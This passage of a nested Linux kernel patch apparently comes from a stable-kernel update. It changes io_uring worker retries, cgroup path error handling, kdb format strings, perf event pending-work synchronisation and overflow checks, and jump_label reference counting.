+ struct pci_dev *pci_dev_get(struct pci_dev *dev);
+ void pci_dev_put(struct pci_dev *dev);
++DEFINE_FREE(pci_dev_put, struct pci_dev *, if (_T) pci_dev_put(_T))
+ void pci_remove_bus(struct pci_bus *b);
+ void pci_stop_and_remove_bus_device(struct pci_dev *dev);
+ void pci_stop_and_remove_bus_device_locked(struct pci_dev *dev);
+@@ -1746,6 +1747,7 @@ void pci_cfg_access_unlock(struct pci_dev *dev);
+ void pci_dev_lock(struct pci_dev *dev);
+ int pci_dev_trylock(struct pci_dev *dev);
+ void pci_dev_unlock(struct pci_dev *dev);
++DEFINE_GUARD(pci_dev, struct pci_dev *, pci_dev_lock(_T), pci_dev_unlock(_T))
+ 
+ /*
+  * PCI domain support.  Sometimes called PCI segment (eg by ACPI),
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 1578a4de1f3cb..27b694552d58b 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -765,6 +765,7 @@ struct perf_event {
+ 	struct irq_work			pending_irq;
+ 	struct callback_head		pending_task;
+ 	unsigned int			pending_work;
++	struct rcuwait			pending_work_wait;
+ 
+ 	atomic_t			event_limit;
+ 
+diff --git a/include/linux/sbitmap.h b/include/linux/sbitmap.h
+index d662cf136021d..c09cdcc99471e 100644
+--- a/include/linux/sbitmap.h
++++ b/include/linux/sbitmap.h
+@@ -36,6 +36,11 @@ struct sbitmap_word {
+ 	 * @cleared: word holding cleared bits
+ 	 */
+ 	unsigned long cleared ____cacheline_aligned_in_smp;
++
++	/**
++	 * @swap_lock: serializes simultaneous updates of ->word and ->cleared
++	 */
++	spinlock_t swap_lock;
+ } ____cacheline_aligned_in_smp;
+ 
+ /**
+diff --git a/include/linux/task_work.h b/include/linux/task_work.h
+index 795ef5a684294..26b8a47f41fca 100644
+--- a/include/linux/task_work.h
++++ b/include/linux/task_work.h
+@@ -30,7 +30,8 @@ int task_work_add(struct task_struct *task, struct callback_head *twork,
+ 
+ struct callback_head *task_work_cancel_match(struct task_struct *task,
+ 	bool (*match)(struct callback_head *, void *data), void *data);
+-struct callback_head *task_work_cancel(struct task_struct *, task_work_func_t);
++struct callback_head *task_work_cancel_func(struct task_struct *, task_work_func_t);
++bool task_work_cancel(struct task_struct *task, struct callback_head *cb);
+ void task_work_run(void);
+ 
+ static inline void exit_task_work(struct task_struct *task)
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 6047058d67037..29b19d0a324c7 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -51,6 +51,7 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 	unsigned int thlen = 0;
+ 	unsigned int p_off = 0;
+ 	unsigned int ip_proto;
++	u64 ret, remainder, gso_size;
+ 
+ 	if (hdr->gso_type != VIRTIO_NET_HDR_GSO_NONE) {
+ 		switch (hdr->gso_type & ~VIRTIO_NET_HDR_GSO_ECN) {
+@@ -87,6 +88,16 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		u32 off = __virtio16_to_cpu(little_endian, hdr->csum_offset);
+ 		u32 needed = start + max_t(u32, thlen, off + sizeof(__sum16));
+ 
++		if (hdr->gso_size) {
++			gso_size = __virtio16_to_cpu(little_endian, hdr->gso_size);
++			ret = div64_u64_rem(skb->len, gso_size, &remainder);
++			if (!(ret && (hdr->gso_size > needed) &&
++						((remainder > needed) || (remainder == 0)))) {
++				return -EINVAL;
++			}
++			skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
++		}
++
+ 		if (!pskb_may_pull(skb, needed))
+ 			return -EINVAL;
+ 
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index 15de07d365405..ca1700c2a5733 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -173,6 +173,7 @@ struct fib_result {
+ 	unsigned char		type;
+ 	unsigned char		scope;
+ 	u32			tclassid;
++	dscp_t			dscp;
+ 	struct fib_nh_common	*nhc;
+ 	struct fib_info		*fi;
+ 	struct fib_table	*table;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 8ea1fba84eff9..cc314c383c532 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -633,6 +633,7 @@ void tcp_skb_collapse_tstamp(struct sk_buff *skb,
+ /* tcp_input.c */
+ void tcp_rearm_rto(struct sock *sk);
+ void tcp_synack_rtt_meas(struct sock *sk, struct request_sock *req);
++void tcp_done_with_error(struct sock *sk, int err);
+ void tcp_reset(struct sock *sk, struct sk_buff *skb);
+ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, struct sk_buff *skb);
+ void tcp_fin(struct sock *sk);
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index 894d9fc8bd94a..e228a44af2915 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -54,7 +54,7 @@ TRACE_DEFINE_ENUM(GSS_S_UNSEQ_TOKEN);
+ TRACE_DEFINE_ENUM(GSS_S_GAP_TOKEN);
+ 
+ #define show_gss_status(x)						\
+-	__print_flags(x, "|",						\
++	__print_symbolic(x, 						\
+ 		{ GSS_S_BAD_MECH, "GSS_S_BAD_MECH" },			\
+ 		{ GSS_S_BAD_NAME, "GSS_S_BAD_NAME" },			\
+ 		{ GSS_S_BAD_NAMETYPE, "GSS_S_BAD_NAMETYPE" },		\
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index 707af820f1a97..672b2e1b47f24 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -1324,7 +1324,7 @@ enum nft_secmark_attributes {
+ #define NFTA_SECMARK_MAX	(__NFTA_SECMARK_MAX - 1)
+ 
+ /* Max security context length */
+-#define NFT_SECMARK_CTX_MAXLEN		256
++#define NFT_SECMARK_CTX_MAXLEN		4096
+ 
+ /**
+  * enum nft_reject_types - nf_tables reject expression reject types
+diff --git a/include/uapi/linux/zorro_ids.h b/include/uapi/linux/zorro_ids.h
+index 6e574d7b7d79c..393f2ee9c0422 100644
+--- a/include/uapi/linux/zorro_ids.h
++++ b/include/uapi/linux/zorro_ids.h
+@@ -449,6 +449,9 @@
+ #define  ZORRO_PROD_VMC_ISDN_BLASTER_Z2				ZORRO_ID(VMC, 0x01, 0)
+ #define  ZORRO_PROD_VMC_HYPERCOM_4				ZORRO_ID(VMC, 0x02, 0)
+ 
++#define ZORRO_MANUF_CSLAB					0x1400
++#define  ZORRO_PROD_CSLAB_WARP_1260				ZORRO_ID(CSLAB, 0x65, 0)
++
+ #define ZORRO_MANUF_INFORMATION					0x157C
+ #define  ZORRO_PROD_INFORMATION_ISDN_ENGINE_I			ZORRO_ID(INFORMATION, 0x64, 0)
+ 
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 98ac9dbcec2f5..04503118cdc10 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -22,6 +22,7 @@
+ #include "io_uring.h"
+ 
+ #define WORKER_IDLE_TIMEOUT	(5 * HZ)
++#define WORKER_INIT_LIMIT	3
+ 
+ enum {
+ 	IO_WORKER_F_UP		= 1,	/* up and active */
+@@ -58,6 +59,7 @@ struct io_worker {
+ 	unsigned long create_state;
+ 	struct callback_head create_work;
+ 	int create_index;
++	int init_retries;
+ 
+ 	union {
+ 		struct rcu_head rcu;
+@@ -729,7 +731,7 @@ static bool io_wq_work_match_all(struct io_wq_work *work, void *data)
+ 	return true;
+ }
+ 
+-static inline bool io_should_retry_thread(long err)
++static inline bool io_should_retry_thread(struct io_worker *worker, long err)
+ {
+ 	/*
+ 	 * Prevent perpetual task_work retry, if the task (or its group) is
+@@ -737,6 +739,8 @@ static inline bool io_should_retry_thread(long err)
+ 	 */
+ 	if (fatal_signal_pending(current))
+ 		return false;
++	if (worker->init_retries++ >= WORKER_INIT_LIMIT)
++		return false;
+ 
+ 	switch (err) {
+ 	case -EAGAIN:
+@@ -763,7 +767,7 @@ static void create_worker_cont(struct callback_head *cb)
+ 		io_init_new_worker(wqe, worker, tsk);
+ 		io_worker_release(worker);
+ 		return;
+-	} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
++	} else if (!io_should_retry_thread(worker, PTR_ERR(tsk))) {
+ 		struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+ 
+ 		atomic_dec(&acct->nr_running);
+@@ -830,7 +834,7 @@ static bool create_io_worker(struct io_wq *wq, struct io_wqe *wqe, int index)
+ 	tsk = create_io_thread(io_wqe_worker, worker, wqe->node);
+ 	if (!IS_ERR(tsk)) {
+ 		io_init_new_worker(wqe, worker, tsk);
+-	} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
++	} else if (!io_should_retry_thread(worker, PTR_ERR(tsk))) {
+ 		kfree(worker);
+ 		goto fail;
+ 	} else {
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 958c3b6190205..b21f2bafaeb04 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -3000,8 +3000,11 @@ __cold void io_uring_cancel_generic(bool cancel_all, struct io_sq_data *sqd)
+ 		bool loop = false;
+ 
+ 		io_uring_drop_tctx_refs(current);
++		if (!tctx_inflight(tctx, !cancel_all))
++			break;
++
+ 		/* read completions before cancelations */
+-		inflight = tctx_inflight(tctx, !cancel_all);
++		inflight = tctx_inflight(tctx, false);
+ 		if (!inflight)
+ 			break;
+ 
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index b0cf05ebcbcc3..7cdc234c5f53f 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -601,7 +601,7 @@ void io_queue_linked_timeout(struct io_kiocb *req)
+ 
+ static bool io_match_task(struct io_kiocb *head, struct task_struct *task,
+ 			  bool cancel_all)
+-	__must_hold(&req->ctx->timeout_lock)
++	__must_hold(&head->ctx->timeout_lock)
+ {
+ 	struct io_kiocb *req;
+ 
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 7582ec4fd4131..bb88fd2266a86 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -378,7 +378,7 @@ const char *btf_type_str(const struct btf_type *t)
+ struct btf_show {
+ 	u64 flags;
+ 	void *target;	/* target of show operation (seq file, buffer) */
+-	void (*showfn)(struct btf_show *show, const char *fmt, va_list args);
++	__printf(2, 0) void (*showfn)(struct btf_show *show, const char *fmt, va_list args);
+ 	const struct btf *btf;
+ 	/* below are used during iteration */
+ 	struct {
+@@ -6792,8 +6792,8 @@ static void btf_type_show(const struct btf *btf, u32 type_id, void *obj,
+ 	btf_type_ops(t)->show(btf, t, type_id, obj, 0, show);
+ }
+ 
+-static void btf_seq_show(struct btf_show *show, const char *fmt,
+-			 va_list args)
++__printf(2, 0) static void btf_seq_show(struct btf_show *show, const char *fmt,
++					va_list args)
+ {
+ 	seq_vprintf((struct seq_file *)show->target, fmt, args);
+ }
+@@ -6826,8 +6826,8 @@ struct btf_show_snprintf {
+ 	int len;		/* length we would have written */
+ };
+ 
+-static void btf_snprintf_show(struct btf_show *show, const char *fmt,
+-			      va_list args)
++__printf(2, 0) static void btf_snprintf_show(struct btf_show *show, const char *fmt,
++					     va_list args)
+ {
+ 	struct btf_show_snprintf *ssnprintf = (struct btf_show_snprintf *)show;
+ 	int len;
+diff --git a/kernel/bpf/dispatcher.c b/kernel/bpf/dispatcher.c
+index c19719f48ce06..fa3e9225aedc0 100644
+--- a/kernel/bpf/dispatcher.c
++++ b/kernel/bpf/dispatcher.c
+@@ -125,6 +125,11 @@ static void bpf_dispatcher_update(struct bpf_dispatcher *d, int prev_num_progs)
+ 
+ 	__BPF_DISPATCHER_UPDATE(d, new ?: (void *)&bpf_dispatcher_nop_func);
+ 
++	/* Make sure all the callers executing the previous/old half of the
++	 * image leave it, so following update call can modify it safely.
++	 */
++	synchronize_rcu();
++
+ 	if (new)
+ 		d->image_off = noff;
+ }
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 289cc873cb719..c2d28ffee3b7b 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -802,7 +802,7 @@ void cgroup1_release_agent(struct work_struct *work)
+ 		goto out_free;
+ 
+ 	ret = cgroup_path_ns(cgrp, pathbuf, PATH_MAX, &init_cgroup_ns);
+-	if (ret < 0 || ret >= PATH_MAX)
++	if (ret < 0)
+ 		goto out_free;
+ 
+ 	argv[0] = agentbuf;
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 97ecca43386d9..1e008ea467c0a 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1910,7 +1910,7 @@ int cgroup_show_path(struct seq_file *sf, struct kernfs_node *kf_node,
+ 	len = kernfs_path_from_node(kf_node, ns_cgroup->kn, buf, PATH_MAX);
+ 	spin_unlock_irq(&css_set_lock);
+ 
+-	if (len >= PATH_MAX)
++	if (len == -E2BIG)
+ 		len = -ERANGE;
+ 	else if (len > 0) {
+ 		seq_escape(sf, buf, " \t\n\\");
+@@ -6287,7 +6287,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 		if (cgroup_on_dfl(cgrp) || !(tsk->flags & PF_EXITING)) {
+ 			retval = cgroup_path_ns_locked(cgrp, buf, PATH_MAX,
+ 						current->nsproxy->cgroup_ns);
+-			if (retval >= PATH_MAX)
++			if (retval == -E2BIG)
+ 				retval = -ENAMETOOLONG;
+ 			if (retval < 0)
+ 				goto out_unlock;
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 01f5a019e0f54..370a6bce20a80 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -21,6 +21,7 @@
+  *  License.  See the file COPYING in the main directory of the Linux
+  *  distribution for more details.
+  */
++#include "cgroup-internal.h"
+ 
+ #include <linux/cpu.h>
+ #include <linux/cpumask.h>
+@@ -4213,11 +4214,15 @@ int proc_cpuset_show(struct seq_file *m, struct pid_namespace *ns,
+ 	if (!buf)
+ 		goto out;
+ 
+-	css = task_get_css(tsk, cpuset_cgrp_id);
+-	retval = cgroup_path_ns(css->cgroup, buf, PATH_MAX,
+-				current->nsproxy->cgroup_ns);
+-	css_put(css);
+-	if (retval >= PATH_MAX)
++	rcu_read_lock();
++	spin_lock_irq(&css_set_lock);
++	css = task_css(tsk, cpuset_cgrp_id);
++	retval = cgroup_path_ns_locked(css->cgroup, buf, PATH_MAX,
++				       current->nsproxy->cgroup_ns);
++	spin_unlock_irq(&css_set_lock);
++	rcu_read_unlock();
++
++	if (retval == -E2BIG)
+ 		retval = -ENAMETOOLONG;
+ 	if (retval < 0)
+ 		goto out_free;
+diff --git a/kernel/debug/kdb/kdb_io.c b/kernel/debug/kdb/kdb_io.c
+index b1f79d5a5a60e..d545abe080876 100644
+--- a/kernel/debug/kdb/kdb_io.c
++++ b/kernel/debug/kdb/kdb_io.c
+@@ -193,7 +193,7 @@ char kdb_getchar(void)
+  */
+ static void kdb_position_cursor(char *prompt, char *buffer, char *cp)
+ {
+-	kdb_printf("\r%s", kdb_prompt_str);
++	kdb_printf("\r%s", prompt);
+ 	if (cp > buffer)
+ 		kdb_printf("%.*s", (int)(cp - buffer), buffer);
+ }
+@@ -357,7 +357,7 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			if (i >= dtab_count)
+ 				kdb_printf("...");
+ 			kdb_printf("\n");
+-			kdb_printf(kdb_prompt_str);
++			kdb_printf("%s",  kdb_prompt_str);
+ 			kdb_printf("%s", buffer);
+ 			if (cp != lastchar)
+ 				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+@@ -449,7 +449,7 @@ char *kdb_getstr(char *buffer, size_t bufsize, const char *prompt)
+ {
+ 	if (prompt && kdb_prompt_str != prompt)
+ 		strscpy(kdb_prompt_str, prompt, CMD_BUFLEN);
+-	kdb_printf(kdb_prompt_str);
++	kdb_printf("%s", kdb_prompt_str);
+ 	kdb_nextline = 1;	/* Prompt and input resets line number */
+ 	return kdb_read(buffer, bufsize);
+ }
+diff --git a/kernel/dma/mapping.c b/kernel/dma/mapping.c
+index 33437d6206445..f1051ad0da7cc 100644
+--- a/kernel/dma/mapping.c
++++ b/kernel/dma/mapping.c
+@@ -63,8 +63,8 @@ void dmam_free_coherent(struct device *dev, size_t size, void *vaddr,
+ {
+ 	struct dma_devres match_data = { size, vaddr, dma_handle };
+ 
+-	dma_free_coherent(dev, size, vaddr, dma_handle);
+ 	WARN_ON(devres_destroy(dev, dmam_release, dmam_match, &match_data));
++	dma_free_coherent(dev, size, vaddr, dma_handle);
+ }
+ EXPORT_SYMBOL(dmam_free_coherent);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 413a69aecf5c7..ba099d5b41cd9 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2316,18 +2316,14 @@ event_sched_out(struct perf_event *event,
+ 	}
+ 
+ 	if (event->pending_sigtrap) {
+-		bool dec = true;
+-
+ 		event->pending_sigtrap = 0;
+ 		if (state != PERF_EVENT_STATE_OFF &&
+-		    !event->pending_work) {
++		    !event->pending_work &&
++		    !task_work_add(current, &event->pending_task, TWA_RESUME)) {
+ 			event->pending_work = 1;
+-			dec = false;
+-			WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount));
+-			task_work_add(current, &event->pending_task, TWA_RESUME);
+-		}
+-		if (dec)
++		} else {
+ 			local_dec(&event->ctx->nr_pending);
++		}
+ 	}
+ 
+ 	perf_event_set_state(event, state);
+@@ -5007,9 +5003,35 @@ static bool exclusive_event_installable(struct perf_event *event,
+ static void perf_addr_filters_splice(struct perf_event *event,
+ 				       struct list_head *head);
+ 
++static void perf_pending_task_sync(struct perf_event *event)
++{
++	struct callback_head *head = &event->pending_task;
++
++	if (!event->pending_work)
++		return;
++	/*
++	 * If the task is queued to the current task's queue, we
++	 * obviously can't wait for it to complete. Simply cancel it.
++	 */
++	if (task_work_cancel(current, head)) {
++		event->pending_work = 0;
++		local_dec(&event->ctx->nr_pending);
++		return;
++	}
++
++	/*
++	 * All accesses related to the event are within the same
++	 * non-preemptible section in perf_pending_task(). The RCU
++	 * grace period before the event is freed will make sure all
++	 * those accesses are complete by then.
++	 */
++	rcuwait_wait_event(&event->pending_work_wait, !event->pending_work, TASK_UNINTERRUPTIBLE);
++}
++
+ static void _free_event(struct perf_event *event)
+ {
+ 	irq_work_sync(&event->pending_irq);
++	perf_pending_task_sync(event);
+ 
+ 	unaccount_event(event);
+ 
+@@ -6307,6 +6329,8 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 			return -EINVAL;
+ 
+ 		nr_pages = vma_size / PAGE_SIZE;
++		if (nr_pages > INT_MAX)
++			return -ENOMEM;
+ 
+ 		mutex_lock(&event->mmap_mutex);
+ 		ret = -EINVAL;
+@@ -6637,24 +6661,28 @@ static void perf_pending_task(struct callback_head *head)
+ 	struct perf_event *event = container_of(head, struct perf_event, pending_task);
+ 	int rctx;
+ 
++	/*
++	 * All accesses to the event must belong to the same implicit RCU read-side
++	 * critical section as the ->pending_work reset. See comment in
++	 * perf_pending_task_sync().
++	 */
++	preempt_disable_notrace();
+ 	/*
+ 	 * If we 'fail' here, that's OK, it means recursion is already disabled
+ 	 * and we won't recurse 'further'.
+ 	 */
+-	preempt_disable_notrace();
+ 	rctx = perf_swevent_get_recursion_context();
+ 
+ 	if (event->pending_work) {
+ 		event->pending_work = 0;
+ 		perf_sigtrap(event);
+ 		local_dec(&event->ctx->nr_pending);
++		rcuwait_wake_up(&event->pending_work_wait);
+ 	}
+ 
+ 	if (rctx >= 0)
+ 		perf_swevent_put_recursion_context(rctx);
+ 	preempt_enable_notrace();
+-
+-	put_event(event);
+ }
+ 
+ #ifdef CONFIG_GUEST_PERF_EVENTS
+@@ -9095,21 +9123,19 @@ static void perf_event_bpf_emit_ksymbols(struct bpf_prog *prog,
+ 	bool unregister = type == PERF_BPF_EVENT_PROG_UNLOAD;
+ 	int i;
+ 
+-	if (prog->aux->func_cnt == 0) {
+-		perf_event_ksymbol(PERF_RECORD_KSYMBOL_TYPE_BPF,
+-				   (u64)(unsigned long)prog->bpf_func,
+-				   prog->jited_len, unregister,
+-				   prog->aux->ksym.name);
+-	} else {
+-		for (i = 0; i < prog->aux->func_cnt; i++) {
+-			struct bpf_prog *subprog = prog->aux->func[i];
+-
+-			perf_event_ksymbol(
+-				PERF_RECORD_KSYMBOL_TYPE_BPF,
+-				(u64)(unsigned long)subprog->bpf_func,
+-				subprog->jited_len, unregister,
+-				subprog->aux->ksym.name);
+-		}
++	perf_event_ksymbol(PERF_RECORD_KSYMBOL_TYPE_BPF,
++			   (u64)(unsigned long)prog->bpf_func,
++			   prog->jited_len, unregister,
++			   prog->aux->ksym.name);
++
++	for (i = 1; i < prog->aux->func_cnt; i++) {
++		struct bpf_prog *subprog = prog->aux->func[i];
++
++		perf_event_ksymbol(
++			PERF_RECORD_KSYMBOL_TYPE_BPF,
++			(u64)(unsigned long)subprog->bpf_func,
++			subprog->jited_len, unregister,
++			subprog->aux->ksym.name);
+ 	}
+ }
+ 
+@@ -11780,6 +11806,7 @@ perf_event_alloc(struct perf_event_attr *attr, int cpu,
+ 	init_waitqueue_head(&event->waitq);
+ 	init_irq_work(&event->pending_irq, perf_pending_irq);
+ 	init_task_work(&event->pending_task, perf_pending_task);
++	rcuwait_init(&event->pending_work_wait);
+ 
+ 	mutex_init(&event->mmap_mutex);
+ 	raw_spin_lock_init(&event->addr_filters.lock);
+diff --git a/kernel/events/internal.h b/kernel/events/internal.h
+index 5150d5f84c033..386d21c7edfa0 100644
+--- a/kernel/events/internal.h
++++ b/kernel/events/internal.h
+@@ -128,7 +128,7 @@ static inline unsigned long perf_data_size(struct perf_buffer *rb)
+ 
+ static inline unsigned long perf_aux_size(struct perf_buffer *rb)
+ {
+-	return rb->aux_nr_pages << PAGE_SHIFT;
++	return (unsigned long)rb->aux_nr_pages << PAGE_SHIFT;
+ }
+ 
+ #define __DEFINE_OUTPUT_COPY_BODY(advance_buf, memcpy_func, ...)	\
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index 45965f13757e4..f3a3c294ff2b3 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -683,7 +683,9 @@ int rb_alloc_aux(struct perf_buffer *rb, struct perf_event *event,
+ 		 * max_order, to aid PMU drivers in double buffering.
+ 		 */
+ 		if (!watermark)
+-			watermark = nr_pages << (PAGE_SHIFT - 1);
++			watermark = min_t(unsigned long,
++					  U32_MAX,
++					  (unsigned long)nr_pages << (PAGE_SHIFT - 1));
+ 
+ 		/*
+ 		 * Use aux_watermark as the basis for chunking to
+diff --git a/kernel/irq/manage.c b/kernel/irq/manage.c
+index 40fe7806cc8c9..a5843563d0154 100644
+--- a/kernel/irq/manage.c
++++ b/kernel/irq/manage.c
+@@ -1324,7 +1324,7 @@ static int irq_thread(void *data)
+ 	 * synchronize_hardirq(). So neither IRQTF_RUNTHREAD nor the
+ 	 * oneshot mask bit can be set.
+ 	 */
+-	task_work_cancel(current, irq_thread_dtor);
++	task_work_cancel_func(current, irq_thread_dtor);
+ 	return 0;
+ }
+ 
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index 714ac4c3b556d..eec802175ccc6 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -113,30 +113,51 @@ int static_key_count(struct static_key *key)
+ }
+ EXPORT_SYMBOL_GPL(static_key_count);
+ 
+-void static_key_slow_inc_cpuslocked(struct static_key *key)
++/*
++ * static_key_fast_inc_not_disabled - adds a user for a static key
++ * @key: static key that must be already enabled
++ *
++ * The caller must make sure that the static key can't get disabled while
++ * in this function. It doesn't patch jump labels, only adds a user to
++ * an already enabled static key.
++ *
++ * Returns true if the increment was done. Unlike refcount_t the ref counter
++ * is not saturated, but will fail to increment on overflow.
++ */
++bool static_key_fast_inc_not_disabled(struct static_key *key)
+ {
+-	int v, v1;
++	int v;
+ 
+ 	STATIC_KEY_CHECK_USE(key);
++	/*
++	 * Negative key->enabled has a special meaning: it sends
++	 * static_key_slow_inc/dec() down the slow path, and it is non-zero
++	 * so it counts as "enabled" in jump_label_update().  Note that
++	 * atomic_inc_unless_negative() checks >= 0, so roll our own.
++	 */
++	v = atomic_read(&key->enabled);
++	do {
++		if (v <= 0 || (v + 1) < 0)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v + 1)));
++
++	return true;
++}
++EXPORT_SYMBOL_GPL(static_key_fast_inc_not_disabled);
++
++bool static_key_slow_inc_cpuslocked(struct static_key *key)
++{
+ 	lockdep_assert_cpus_held();
+ 
+ 	/*
+-	 * Careful if we get concurrent static_key_slow_inc() calls;
++	 * Careful if we get concurrent static_key_slow_inc/dec() calls;
+ 	 * later calls must wait for the first one to _finish_ the
+ 	 * jump_label_update() process.  At the same time, however,
+ 	 * the jump_label_update() call below wants to see
+ 	 * static_key_enabled(&key) for jumps to be updated properly.
+-	 *
+-	 * So give a special meaning to negative key->enabled: it sends
+-	 * static_key_slow_inc() down the slow path, and it is non-zero
+-	 * so it counts as "enabled" in jump_label_update().  Note that
+-	 * atomic_inc_unless_negative() checks >= 0, so roll our own.
+ 	 */
+-	for (v = atomic_read(&key->enabled); v > 0; v = v1) {
+-		v1 = atomic_cmpxchg(&key->enabled, v, v + 1);
+-		if (likely(v1 == v))
+-			return;
+-	}
++	if (static_key_fast_inc_not_disabled(key))
++		return true;
+ 
+ 	jump_label_lock();
+ 	if (atomic_read(&key->enabled) == 0) {
+@@ -148,16 +169,23 @@ void static_key_slow_inc_cpuslocked(struct static_key *key)
+ 		 */
+ 		atomic_set_release(&key->enabled, 1);
+ 	} else {
+-		atomic_inc(&key->enabled);
++		if (WARN_ON_ONCE(!static_key_fast_inc_not_disabled(key))) {
++			jump_label_unlock();
++			return false;
++		}
+ 	}
+ 	jump_label_unlock();
++	return true;
+ }
+ 
+-void static_key_slow_inc(struct static_key *key)
++bool static_key_slow_inc(struct static_key *key)
+ {
++	bool ret;
++
+ 	cpus_read_lock();
+-	static_key_slow_inc_cpuslocked(key);
++	ret = static_key_slow_inc_cpuslocked(key);
+ 	cpus_read_unlock();
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(static_key_slow_inc);
+ 
+@@ -219,20 +247,32 @@ EXPORT_SYMBOL_GPL(static_key_disable);
+ 
+ static bool static_key_slow_try_dec(struct static_key *key)
+ {
+-	int val;
+-
+-	val = atomic_fetch_add_unless(&key->enabled, -1, 1);
+-	if (val == 1)
+-		return false;
++	int v;
+ 
+ 	/*
+-	 * The negative count check is valid even when a negative
+-	 * key->enabled is in use by static_key_slow_inc(); a
+-	 * __static_key_slow_dec() before the first static_key_slow_inc()
+-	 * returns is unbalanced, because all other static_key_slow_inc()
+-	 * instances block while the update is in progress.
++	 * Go into the slow path if key::enabled is less than or equal than
++	 * one. One is valid to shut down the key, anything less than one
++	 * is an imbalance, which is handled at the call site.
++	 *
++	 * That includes the special case of '-1' which is set in
++	 * static_key_slow_inc_cpuslocked(), but that's harmless as it is
++	 * fully serialized in the slow path below. By the time this task
++	 * acquires the jump label lock the value is back to one and the
++	 * retry under the lock must succeed.
+ 	 */
+-	WARN(val < 0, "jump label: negative count!\n");
++	v = atomic_read(&key->enabled);
++	do {
++		/*
++		 * Warn about the '-1' case though; since that means a
++		 * decrement is concurrent with a first (0->1) increment. IOW
++		 * people are trying to disable something that wasn't yet fully
++		 * enabled. This suggests an ordering problem on the user side.
++		 */
++		WARN_ON_ONCE(v < 0);
++		if (v <= 1)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v - 1)));
++
+ 	return true;
+ }
+ 
+@@ -243,10 +283,11 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 	if (static_key_slow_try_dec(key))
+ 		return;
+ 
+-	jump_label_lock();
+-	if (atomic_dec_and_test(&key->enabled))
++	guard(mutex)(&jump_label_mutex);
++	if (atomic_cmpxchg(&key->enabled, 1, 0))
+ 		jump_label_update(key);
+-	jump_label_unlock();
++	else
++		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+ }
+ 
+ static void __static_key_slow_dec(struct static_key *key)
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 92d8e2c4edda0..ffc2bbe391879 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1308,7 +1308,7 @@ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ /*
+  * lock for writing
+  */
+-static inline int __down_write_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_write_common(struct rw_semaphore *sem, int state)
+ {
+ 	if (unlikely(!rwsem_write_trylock(sem))) {
+ 		if (IS_ERR(rwsem_down_write_slowpath(sem, state)))
+@@ -1318,12 +1318,12 @@ static inline int __down_write_common(struct rw_semaphore *sem, int state)
+ 	return 0;
+ }
+ 
+-static inline void __down_write(struct rw_semaphore *sem)
++static __always_inline void __down_write(struct rw_semaphore *sem)
+ {
+ 	__down_write_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_write_killable(struct rw_semaphore *sem)
++static __always_inline int __down_write_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_write_common(sem, TASK_KILLABLE);
+ }
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
